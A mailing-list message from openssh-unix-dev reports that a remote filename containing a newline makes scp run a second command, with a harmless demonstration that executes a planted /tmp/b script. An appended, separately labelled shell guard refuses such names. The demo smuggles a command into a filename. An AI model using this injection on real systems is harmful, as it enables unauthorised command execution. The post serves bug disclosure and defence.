Re: scp, sftp, and special characters in filenames

On 4/11/19 3:29 am, Demi M. Obenour wrote:
> I have not been able to get scp(1) to download a file with a newline
> in its name.  I know that scp(1) requires that remote filenames be
> escaped for the shell, but that leads to protocol errors.

I see something much worse:

   $ sudo sh
   # echo "#!/bin/sh
   touch /tmp/b-ran" > /tmp/b
   # chmod a+x /tmp/b
   # exit
   $ touch a 'a
   b'
   $ rm -f abc /tmp/b-ran
   $ scp localhost:'a
   b' abc
   a                                                 100%    0     0.0KB/s   00:00
   $ ls /tmp/b-ran
   /tmp/b-ran

Scp can be exploited to run commands, which I think is a problem.

_______________________________________________
openssh-unix-dev mailing list
openssh-unix-dev@xxxxxxxxxxx
https://lists.mindrot.org/mailman/listinfo/openssh-unix-dev
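
A client-side guard for the behaviour shown in the message above, as an added example that is not part of the original post or of OpenSSH: it refuses remote names containing control characters and single-quotes everything else before the name reaches scp. It assumes the legacy scp protocol, where the remote shell interprets the path (since OpenSSH 9.0 scp defaults to SFTP and needs -O for that mode); the function names and sample filenames are hypothetical.

```shell
#!/bin/sh
# Added example (not from the thread). Assumes the legacy scp protocol, where
# the remote side runs the requested path through the login shell.

# Succeed only if $1 is non-empty and has no control bytes (newline, tab, ESC...).
path_is_safe() {
    [ -n "$1" ] || return 1
    stripped=$(printf '%s' "$1" | LC_ALL=C tr -d '[:cntrl:]')
    [ "$stripped" = "$1" ]
}

# Wrap $1 in single quotes for the remote shell; each ' becomes '\''.
shell_quote() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# Print "host:quoted-path" for use as an scp source, or fail for unsafe names.
remote_arg() {
    if ! path_is_safe "$2"; then
        printf 'refusing remote path containing control characters\n' >&2
        return 1
    fi
    printf '%s:%s' "$1" "$(shell_quote "$2")"
}

# Constructed sample names; the last is the two-line name used in the thread.
for name in 'report 2019.txt' "it's.txt" 'a
b'; do
    if arg=$(remote_arg localhost "$name" 2>/dev/null); then
        printf 'ok:      scp %s ./dest\n' "$arg"
    else
        printf 'refused: name contains a control character\n'
    fi
done
```

Names with a newline are refused rather than quoted because the thread reports that escaping them leads to protocol errors.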